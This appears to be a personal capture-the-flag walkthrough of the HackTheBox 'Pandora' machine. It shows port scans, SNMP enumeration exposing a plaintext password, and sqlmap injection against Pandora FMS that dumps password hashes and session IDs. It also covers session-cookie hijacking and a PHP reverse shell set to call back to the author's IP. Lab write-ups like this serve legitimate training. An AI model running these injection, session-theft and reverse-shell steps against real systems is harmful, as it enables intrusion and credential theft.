/etc/hosts 1 10.10.11.136 pandora.htb
nmap 1 2 3 4 5 6 nmap -sV -p- 10.10.11.136 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
wfuzz 1 wfuzz --sc 200 -w Documents/wordlist/directory-list-2.3-medium.txt http://pandora.htb/FUZZ
Nothing, same for the subdoimains.
nmap n°2 1 sudo nmap -sU --min-rate 100 pandora.htb
1 2 3 PORT STATE SERVICE 161/udp open snmp 19283/udp closed keysrvr
let’s see what we can do with snmp
Matasploit 1 2 3 4 msfconsole use auxiliary/scanner/snmp/snmp_enum show options set rhost 10.10.11.136
This is so cool, I can see every process, there is lot off hackers in the box.
/usr/bin/host_check -u daniel -p HotelBabylon23
ssh lse
on My computer in my script directory
1 python2.7 -m SimpleHTTPServer
on the target
1 2 3 wget http://10.10.15.22:8000/lse.sh chmod +x lse.sh./lse.sh
1 2 3 4 5 6 7 ============================================================( file system )===== [*] fst000 Writable files outside user's home.............................. yes! [*] fst010 Binaries with setuid bit........................................ yes! [!] fst020 Uncommon setuid binaries........................................ yes! --- /usr/bin/pandora_backup ---
pownkit
1 root 960 0.0 0.2 236420 8932 ? Ssl 10:00 0:00 /usr/lib/policykit-1/polkitd --no-debug
I have to resist!!!
pandora_backup
I have to pwn matt first.
linPEAS https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
I’m not supposed to use this exploit…
I have other open ports.
Interesting files
Mysql user:
mysql 1 2 3 4 5 6 nmap -sV -p- 127.0.0.1 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) 3306/tcp open mysql MySQL 5.5.5-10.3.32-MariaDB-0ubuntu0.20.04.1
I don’t have the creds
web I wanted to browse pandora.panda.htb:
it’s in my /etc/hosts but it’s not working, so tryed to do it via ssh with curl.
Same problem, let’s see his /etc/hosts
1 2 3 daniel@pandora:/tmp/dir$ cat /etc/hosts 127.0.0.1 localhost.localdomain pandora.htb pandora.pandora.htb 127.0.1.1 pandora
127.0.0.1 pandora is the website I saw on the port 80,
1 2 daniel@pandora:/tmp/dir$ curl pandora.pandora.htb <meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/" >
Yesss!!!!
Web tunneling https://www.it-connect.fr/chapitres/tunneling-ssh/
Boom!
Where is the password… what is the username…(╯°□°)╯︵ ┻━┻)
Oh no I have to be fast.
Connnect with daniel I was trying to connect with daniel.
It’s good, I have to use the API.
Browsing the files In /var/www/pandora/pandora_console
1 cat pandoradb.sql |grep pass
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 `plugin_pass` text, `password` varchar (45 ) default '' , `password` text, `snmp_auth_pass` varchar (255 ) NOT NULL default '' , `snmp_privacy_pass` varchar (255 ) NOT NULL default '' , `plugin_pass` text, `password` varchar (45 ) default NULL , `force_change_pass` tinyint(1 ) unsigned NOT NULL default 0 , `last_pass_change` DATETIME NOT NULL DEFAULT 0 , `ehorus_user_level_pass` VARCHAR (45 ), CREATE TABLE IF NOT EXISTS `treset_pass_history` ( `pass_opt` varchar (50 ) default '' , `pass` varchar (100 ) NOT NULL default '' , `is_password_type` tinyint(1 ) NOT NULL default 0 , CREATE TABLE IF NOT EXISTS `tpassword_history` ( `id_pass` int (10 ) unsigned NOT NULL auto_increment, `password` varchar (45 ) default NULL , PRIMARY KEY (`id_pass`) `plugin_pass` text default '' , `password` varchar (100 ) default '' , `password` varchar (100 ) default '' , `dbpass` text, `meta_dbpass` text, `api_password` text NOT NULL , CREATE TABLE IF NOT EXISTS `treset_pass` (
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 FROM mysql:5.5 MAINTAINER Pandora FMS Team <[email protected] > WORKDIR /pandorafms/pandora_console ADD pandoradb.sql /docker-entrypoint-initdb.d ADD pandoradb_data.sql /docker-entrypoint-initdb.d RUN chown mysql /docker-entrypoint-initdb.d ENV MYSQL_DATABASE=pandora RUN echo " \n\ sed -i \"1iUSE \$MYSQL_DATABASE\" /docker-entrypoint-initdb.d/pandoradb.sql \n\ sed -i \"1iUSE \$MYSQL_DATABASE\" /docker-entrypoint-initdb.d/pandoradb_data.sql \n\ " >> /docker-entrypoint-initdb.d/create_pandoradb.sh
Dbmane=”pandora”https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained
sqlmap I don’t use sqlmap very often, that’s why I had lot of trouble.
1 2 3 sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php" -D pandora [20:44:13] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1' ). You are advised to rerun with '--crawl=2'
1 2 3 sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?id=''" -D pandora --tables [20:45:33] [WARNING] GET parameter 'id' does not seem to be injectable
Now I have to find out what I have to use instead if ‘id’.
1 2 3 sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''" -D pandora [20:47:42] [WARNING] potential permission problems detected ('Access denied' )
I have an another error, it’s good.https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet
1 2 3 4 5 6 7 8 sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tpassword_history --dump +---------+---------+---------------------+----------------------------------+---------------------+ | id_pass | id_user | date_end | password | date_begin | +---------+---------+---------------------+----------------------------------+---------------------+ | 1 | matt | 0000-00-00 00:00:00 | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 | | 2 | daniel | 0000-00-00 00:00:00 | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 | +---------+---------+---------------------+----------------------------------+---------------------+
list of tables 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''" -D pandora --tables [178 tables] +------------------------------------+ | taddress | | taddress_agent | | tagent_access | | tagent_custom_data | | tagent_custom_fields | | tagent_custom_fields_filter | | tagent_module_inventory | | tagent_module_log | | tagent_repository | | tagent_secondary_group | | tagente | | tagente_datos | | tagente_datos_inc | | tagente_datos_inventory | | tagente_datos_log4x | | tagente_datos_string | | tagente_estado | | tagente_modulo | | talert_actions | | talert_commands | | talert_snmp | | talert_snmp_action | | talert_special_days | | talert_template_module_actions | | talert_template_modules | | talert_templates | | tattachment | | tautoconfig | | tautoconfig_actions | | tautoconfig_rules | | tcategory | | tcluster | | tcluster_agent | | tcluster_item | | tcollection | | tconfig | | tconfig_os | | tcontainer | | tcontainer_item | | tcredential_store | | tdashboard | | tdatabase | | tdeployment_hosts | | tevent_alert | | tevent_alert_action | | tevent_custom_field | | tevent_extended | | tevent_filter | | tevent_response | | tevent_rule | | tevento | | textension_translate_string | | tfiles_repo | | tfiles_repo_group | | tgis_data_history | | tgis_data_status | | tgis_map | | tgis_map_connection | | tgis_map_has_tgis_map_con | | tgis_map_layer | | tgis_map_layer_groups | | tgis_map_layer_has_tagente | | tgraph | | tgraph_source | | tgraph_source_template | | tgraph_template | | tgroup_stat | | tgrupo | | tincidencia | | titem | | tlanguage | | tlayout | | tlayout_data | | tlayout_template | | tlayout_template_data | | tlink | | tlocal_component | | tlog_graph_models | | tmap | | tmensajes | | tmetaconsole_agent | | tmetaconsole_agent_secondary_group | | tmetaconsole_event | | tmetaconsole_event_history | | tmetaconsole_setup | | tmigration_module_queue | | tmigration_queue | | tmodule | | tmodule_group | | tmodule_inventory | | tmodule_relationship | | tmodule_synth | | tnetflow_filter | | tnetflow_report | | tnetflow_report_content | | tnetwork_component | | tnetwork_component_group | | tnetwork_map | | tnetwork_matrix | | tnetwork_profile | | tnetwork_profile_component | | tnetworkmap_ent_rel_nodes | | tnetworkmap_enterprise | | tnetworkmap_enterprise_nodes | | tnews | | tnota | | tnotification_group | | tnotification_source | | tnotification_source_group | | tnotification_source_group_user | | tnotification_source_user | | tnotification_user | | torigen | | tpassword_history | | tperfil | | tphase | | tplanned_downtime | | tplanned_downtime_agents | | tplanned_downtime_modules | | tplugin | | tpolicies | | tpolicy_agents | | tpolicy_alerts | | tpolicy_alerts_actions | | tpolicy_collections | | tpolicy_groups | | tpolicy_modules | | tpolicy_modules_inventory | | tpolicy_plugins | | tpolicy_queue | | tprofile_view | | tprovisioning | | tprovisioning_rules | | trecon_script | | trecon_task | | trel_item | | tremote_command | | tremote_command_target | | treport | | treport_content | | treport_content_item | | treport_content_item_temp | | treport_content_sla_com_temp | | treport_content_sla_combined | | treport_content_template | | treport_custom_sql | | treport_template | | treset_pass | | treset_pass_history | | tserver | | tserver_export | | tserver_export_data | | tservice | | tservice_element | | tsesion | | tsesion_extended | | tsessions_php | | tskin | | tsnmp_filter | | ttag | | ttag_module | | ttag_policy_module | | ttipo_modulo | | ttransaction | | ttrap | | ttrap_custom_values | | tupdate | | tupdate_journal | | tupdate_package | | tupdate_settings | | tuser_double_auth | | tuser_task | | tuser_task_scheduled | | tusuario | | tusuario_perfil | | tvisual_console_elements_cache | | twidget | | twidget_dashboard | +------------------------------------+
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump +----------------------------+------------------------------------------------------+-------------+ | id_session | data | last_active | +----------------------------+------------------------------------------------------+-------------+ | 07ou61d2jsi3087a9jg12s3m1k | NULL | 1644502695 | | 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel" ; | 1638783555 | | 0ahul7feb1l9db7ffp8d25sjba | NULL | 1638789018 | | 1t2n71opaqeoausmhaqk277c21 | id_usuario|s:6:"daniel" ; | 1644502477 | | 1um23if7s531kqf5da14kf5lvm | NULL | 1638792211 | | 2e25c62vc3odbppmg6pjbf9bum | NULL | 1638786129 | | 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel" ; | 1638540332 | | 3fq6hl9r8kbadgq6r5bfjmojm5 | NULL | 1644502325 | | 3me2jjab4atfa5f8106iklh4fc | NULL | 1638795380 | | 4f51mju7kcuonuqor3876n8o02 | NULL | 1638786842 | | 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel" ; | 1638535373 | | 59qae699l0971h13qmbpqahlls | NULL | 1638787305 | | 5fihkihbip2jioll1a8mcsmp6j | NULL | 1638792685 | | 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel" ; | 1638281946 | | 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel" ; | 1641195617 | | 81f3uet7p3esgiq02d4cjj48rc | NULL | 1623957150 | | 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel" ; | 1638446321 | | 8uiokruc91od5tphgekpsau4lp | alert_msg|a:0:{}new_chat|b:0; | 1644502812 | | 8upeameujo9nhki3ps0fu32cgd | NULL | 1638787267 | | 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel" ; | 1638881787 | | a3a49kc938u7od6e6mlip1ej80 | NULL | 1638795315 | | agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel" ; | 1638881664 | | cojb6rgubs18ipb35b3f6hf0vp | NULL | 1638787213 | | d0carbrks2lvmb90ergj7jv6po | NULL | 1638786277 | | d0h8gpqrh99ur3pfcb53vqak5e | NULL | 1644513572 | | elks2rkjdnk8f001jqbkinael0 | NULL | 1644513405 | | eqsc2gjr37g0ug1q4qdk3rabh4 | id_usuario|s:5:"admin" ;alert_msg|a:0:{}new_chat|b:0; | 1644502437 | | f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel" ; | 1641200284 | | fikt9p6i78no7aofn74rr71m85 | NULL | 1638786504 | | fqd96rcv4ecuqs409n5qsleufi | NULL | 1638786762 | | g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel" ; | 1638783230 | | g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt" ;alert_msg|a:0:{}new_chat|b:0; | 1644512890 | | gf40pukfdinc63nm5lkroidde6 | NULL | 1638786349 | | h1ge39342hcid93s3ghk0nhl3c | NULL | 1644502501 | | heasjj8c48ikjlvsf1uhonfesv | NULL | 1638540345 | | hif1pavjlks18e7oqgu8bmvhis | NULL | 1644513371 | | hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel" ; | 1638168492 | | j85l7a3q010b3ul6sv2eh6amo6 | NULL | 1644502455 | | jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel" ; | 1638456173 | | kp90bu1mlclbaenaljem590ik3 | NULL | 1638787808 | | ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL | 1638796348 | | o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel" ; | 1638540482 | | oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel" ; | 1637667827 | | pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel" ; | 1638168416 | | qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL | 1638787723 | | r097jr6k9s7k166vkvaj17na1u | NULL | 1638787677 | | rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel" ; | 1638889082 | | u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel" ; | 1638547193 | | u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel" ; | 1638793297 | | vntmpokca9aee53q48op3mesqs | id_usuario|s:6:"daniel" ; | 1644502107 | +----------------------------+------------------------------------------------------+-------------+
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:”matt”;alert_msg|a:0:{}new_chat|b:0;
You have to past it in the cookie.
Refresh the page..
I have to kill them.
Oh, sorry ppl, it’s not working.
https://github.com/jpillora/chisel
As admin. Now I’m admin on the machine, I had to wait 2 hours.
Download the revershell I’v downloaded a reversshell here:https://github.com/pentestmonkey/php-reverse-shell
1 2 $ip = '10.10.15.27' ; // CHANGE THIS$port = 4648; // CHANGE THIS
Zip it 1 zip -r php-reverse-shell.zip php-reverse-shell.php
netcat Upload it
I’m matt
pandora_backup I can’t be admin on the webpage, it’s buggy.
